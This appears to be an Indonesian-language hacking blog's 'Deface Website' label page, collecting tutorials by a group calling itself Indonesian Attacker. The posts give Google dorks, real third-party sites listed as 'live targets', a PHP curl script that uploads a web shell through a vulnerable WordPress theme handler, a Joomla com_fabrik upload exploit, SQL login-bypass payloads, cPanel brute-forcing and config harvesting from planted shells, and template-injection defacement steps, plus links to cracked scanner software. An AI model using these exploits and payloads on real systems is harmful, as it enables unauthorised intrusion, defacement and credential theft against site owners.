Tampilkan postingan dengan label Deface Website. Tampilkan semua postingan
Tampilkan postingan dengan label Deface Website. Tampilkan semua postingan

Minggu, 16 Februari 2014

Silentum Uploader Upload Vulnerability

Assalamualaikum...Hari ini saya nak ajar cara deface dengan mudah dan cepat, bagi newbie yang baru nak belajar deface memang sesuai untuk menggunakan cara ini dulu...
ok let's go
Dork : Inurl:upload.php intext:"htm html" site:.com / org / net etc
            Intext:Powered by: Silentum Uploader

File yang dibenarkan hanyalah yang seperti berikut: .doc, .htm, .html, .odt, .pdf, .rtf, .sxw, .txt and etc

Demo All Website Vuln


http://bn.thedocumentsguy.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.thiagocavaleiro.com.br/site/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://site.foilgraphicsgifts.com/upload.php
http://www.webstyling.it/script/php/upload/3/upload.php
http://www.hiphopcars.com/black_models_divas/upload.php
http://actorsal.com/upload.php
 
Sumber : GCA

Deface Dengan Exploit orange themes File Upload

Assalamualaikum sobat Indonesian Attacker :)
Sekarang Ada Waktu Luang Untuk Share Tutor
Exploit orange themes File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork

inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"  

2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"

3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>



4).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D



5).Aktifkan XAMPP Klik Start Pada Apache




6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php



8)ketik php namascript.php Contoh: php lol.php
9).Jika Succes Akan Ada Nama Shellnya :D

10).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php

Cara Mencari Halaman Web Login Dengan Acunetix Web Vulnerability Scanner 8

Assalamualaikum sobat2 Indonesian Attacker.. :p

Hmm,, dilihat dari keluhan2 sobat, kebanyakan saat melakukan eksploitasi web dengan metode SQL Injection, rata rata2 kesulitan menemukan halaman login admin web, jadi sedikit ane share trik nya yahh.. yup langsung di simak aja! :p
kok pake Acunetix, iyah ane kadang make untuk melihat struktur dari website tersebut (Crawler) besar kemungkinan dengan fitur crawler kita bisa mendapatkan direktori sensitif dari website target, seperti cgi, admin, dsb. Sedangkan pada tool-tools admin finders kita mencari dengan cara hanya menggunakan list umum seperti : admin, login, system dsb. jadi kita hanya terpatok di list itu aja .

Lihat Gambar!


Download : Acunetix Web Vulnerability Scanner 8 dan Patch+Key

Password: Lihat

yup begitu saja yah, moga bermanfaat ;)

UPDATE: Link download sudah diperbaiki.. :D

Content Created By Onix AQua

Mencari Config Dalam Website


Hi, ketemu lagi sama ane ./Cyber404 ^_^

Kali ini aku mau kasih trik cara mendapatkan web yang 1 server sama web yang kita sudah pasang shell, kebanyakan nyebutnya CONFIG.

Ya udah tanpa mengulur waktu langsung saja kita masuk ke tutorialnya :D

[+] BAHAN [+]

  • Shell (kalau belum punya download disini)
  • MySQL (kalau belum punya klik download) #recode 




1. Siapkan website yang udah kalian tanami shell/backdoor :D (sebagai contoh saya memakai http://sariamelia.com )

2. Klik EVAL didalam shell/backdoor kalian (lihat gambar)

3. Jika sudah, lalu klik GO (lihat gambar)
4. Lalu copy semua yang terdapat dalam kolom tersebut (lihat gambar)
5. Next, kalian klik CONFIG (tampilan seperti ini)
6. Lalu, paste kode yang kalian dapat (step 4) tadi di kolom yang disediakan (lihat gambar)
7. Lalu klik HAJAR, jika sukses tampilan kurang lebih akan seperti ini
8. Sekarang tinggal kalian panggil CONFIGnya, caranya 
# Jika kalian upload shell tadi di wp-content maka manggilnya http://domain.com/wp-content/config
*intinya ganti (nama shell kamu tadi dengan "config")
9. Jika sukses, tampilan akan seperti ini
10. Sekarang tinggal upload script "mysql.php"nya :)

Sekian tutorial dari ane ./Cyber404 , kalo kurang jelas bisa tanyakan pada (./Cyber404)

#yang belum tau cara deface dengan config silahkan kesini gan :)
#Special Thanks To : Mr. Gandrunx | X Inject
Keyword : Hack Dengan Config . Cara Mencari Website Satu Server , Deface Website Mudah

Cara Crack Cpanel 2013


Assalamualaikum...

Nah, Saat ini udah banyak yg tau kan bagamana nanem shell di website? :D kalo belum tau, belajar lagi sono, :D soalnya kalo kagak bisa tanem shell bijimane mau crack cpanel :) oke dah, kali ini saya menulis artikel mengenai cara crack cpanel menggunakan Shell 1n73ction v.32 . Thankz to om X'Inject :D
Yup, Rata2 di blogg2 udah banyak yg share ni, makanya kita ga mau ketinggalan juga nih :D perlu diketahui, tutorial ini sedikit berbeda dengan tutorial kami sebelumnya, kalo belum tau silahkan baca lagi Cara Crack Cpanel, langsung dah meluncur :)

Sediakan bahan2nya dolo :D kayak mau masak aja :D

1. Shell 1n73ction v.32 | Download |

Pass File : http://indocyberarmy.blogspot.com
Pass Shell : 1n73ction

2. Web Shelled

3. Web Config

Yuk mari kita lanjutkan ke langkah langkahnya :D

Pertama tentunya kita harus punya web yg sudah ditanem shell :D



Kemudian disini saya juga udah punya Web Confignya :P kalo belum tau gimana nyari config, Lihat aja artikel Cara Mencari Config :p

Lalu pada Shell 1n73ction, klik Cpanel Bruteforce



Nah, ntar muncul dah toolsnya :)


Setelah itu, masukkan url yang berisikan config web di kolom Url Config, Liat gambar dibawah :)


Klik GO dan tunggu aja sampai selesai :)


Nah, kalo udah selesai, disitu ada kumpulan wordlist2 yang akan kita gunakan sebagai wordlist password, copy aja dan masukkan di kolom Pass.



Lalu klik Start dan tunggu dah sampe selesai :)


Tuh, udah dapet :) langsung dah loggin ke cpanelnya :)

Sekian Tutorial ane mudah2an bermanfaat,, thanks udah mampir :) jangan lupa komentarnya -_- :D

Content Creator : Onix AQua

Cara Tebas Index Website CMS Joomla

Assalamualaikum ..

Ketemu lagi dengan tutorial semrawut dari ane ^o^, yoo kali ini ane mau share nih cara tebas INDEX dari CMS Joomla :D

Mengingat di Group masih banyak teman teman yang bertanya cara Tebas Index Joomla :D


Yuk, basa basinya udahan  kowkowkwk .

Oke simak dulu yah, nanti kalo belum faham baru tanya di Groups, atau di komentar ^_^

Saya anggap kalian udah ada live targetnya yah, kalo belum bisa dibaca disini


Oke langsung saja kita mulai.

1.  Kalian Klik Icon "TEMPLATE MANAGER" (see image)


2. Lalu klik "template" (see image)
3.  Lalu pilih template yang aktif di website tersebut.
4. Lalu klik "Edit Main Page Template" (see image)

5. Lalu pastekan "Shell/Script" kalian di kolom yang tersedia :D
#WARNING : Back Up dulu script asli website tersebut ^o^

6. Jeng jenggggggg !!!! sekarang cek deh hasilnya di Index websitenya ^_^

NB : Jika gagal, maka ulangin lagi dari step ke-3 :)

Sekian tutorial singkat dari saya :D. jika kurang jelas bisa kalian tanyakan kok :p

Content Creator By : Bimo Septiawan

tag : deface joomla , deface index . cara mudah deface index , exploit joomla

Deface Dengan Exploit Joomla | com_fabric


Assalamualaikum....

Salam kompak Sobat Indonesian Attacker,

Lanjut lagi Walking Blogg :D

Nah, kali ini saya cuma mau berbagi saja tentang Exploit Joomla, walaupun ini bugs lama, tapi masih bisa juga digunakan untuk depes2,, wkwkwk :D

Sebelumnya sedikit Nasihat dari saya :

"Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"


Oke, langsung aja... Berikut langkah2nya:

Live Target: http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google

inurl:index.php?option=com_fabrik


 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D


3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:

Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV

Note: Kalo ga bisa upload ext. PHP coba gunakan Tamper data, tapi kalo ga bisa juga coba aja upload file .html, .txt  :)


5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php



 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial





 Content Created By Onix AQua

Tools JCE Server Scanner (Python & PHP)

Assalamualaikum...


Berhubung saya lupa2 mulu mo posting ni tools, jadi maaf aja kalo udah telat hehehe :D Fungsi dari tools scanner ini yaitu memudahkan mencari target website dalam satu server yang vulnerable terhadap JCE secara otomatis sehingga tanpa harus mengecek vulnerabilitas webnya satu persatu :) silahkan di sedot aja yah :)

1. JCE Scanner (Python)


2. JCE Scanner (PHP)


Cara penggunaannya cukup simple, untuk menggunakan tools ini sobat harus menginstall Python dan PHP sebagai pendukung, karena kedua tools ini dibuat dari bahasa Python dan PHP :) disini sobat hanya memasukkan IP web targetnya, kemudian biarkan tools bekerja mencari web yang vuln JCE :D untuk tutorial JCE silahkan baca artikel sebelmnya disini Begitu saja yang bisa saya berikan, mudah2an bisa bermanfaat buat sobat semua...

Content Creator : Onix AQua

Subgraph Vega Web Vulnerability Scanner

Vega adalah scanner gratis dan open source dan platform penetration test untuk menguji keamanan aplikasi web. Vega dapat membantu Anda menemukan dan memvalidasi SQL Injection, Cross-Site Scripting (XSS),  mengungkapkan informasi sensitif, dan kerentanan lainnya. Scanner ini ditulis dalam bahasa Java, yang berbasis GUI, dan dapat berjalan pada Linux, OS X, dan Windows.

Vega mencakup scanner otomatis untuk pengujian secara cepat dan memiliki fitur proxy dalam pemeriksaan taktis. Vega scanner dapat menemukan XSS (cross-site scripting), injeksi SQL, dan kerentanan lainnya. Vega dapat dikembangkan dengan menggunakan API dalam bahasa web: Javascript.

FETURES

Modules
  • Cross Site Scripting (XSS)
  • SQL Injection
  • Directory Traversal
  • URL Injection
  • Error Detection
  • File Uploads
  • Sensitive Data Discovery
Core
  • Automated Crawler and Vulnerability Scanner
  • Consistent UI
  • Website Crawler
  • Intercepting Proxy
  • SSL MITM
  • Content Analysis
  • Extensibility through a Powerful Javascript Module API
  • Customizable alerts
  • Database and Shared Data Model
Untuk menjalaankan scanner ini dibutuhkan aplikasi Java sebagai pendukung.
Download Subgraph Vega Web Vulnerability Scanner :

Sumber : IDCA

Tutorial Bypass SQL Login

Assalamuallaikum sobat Indonesian Attacker :)
Berhubung tadi pada minta tutorial deface, ya sudaaah saya kabulin dah. Pada artikel ini saya akan membahas mengenai "Bypass SQL Login" maksudnya gimana tuh?

Maksudnya.. dengan memanfaatkan eror pada sql website tersebut kita dapat login ke administrator web tersebut tanpa harus memasukan username dan password yang sudah dibuat admin. Singkatnya sih "bypass = bye bye password"

Oke langsung  saja kita masuk ke tutorialnya :

[#] Dork


inurl:manager intitle:Admin Panel
inurl:/admin2/ ext:php
inurk:/admin/ ext:php
inurl:/adminpanel/ ext:php
inurl:/admin_panel/
[#] Langkah-langkah

1. Masukan salah satu dork diatas ke google, lalu pilih salah satu buat demo silahkan coba web ini

http://preprojects.com/hostfriendz/int/index.php
2. Jika sudah memilih target silahkan anda coba login dengan user pass ini :
user : ' or 1=1 limit 1 -- -+ pass : ' or 1=1 limit 1 -- -+

 
Nah jika berhasil ya sudah deh terserah mau kalian apakan :D
Simpel ya hhee dah cukup itu aja kok :D

Sekian tutorial dari saya thanks to Mr Xenophobic ^_^

untuk kedepannya jika saya sudah dapat banyak refrensi, artikel ini akan saya perbarui dengan menambah macam erornya dan kenapa bisa masuk

Author : Bimo Septiawan

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Bluehost Coupons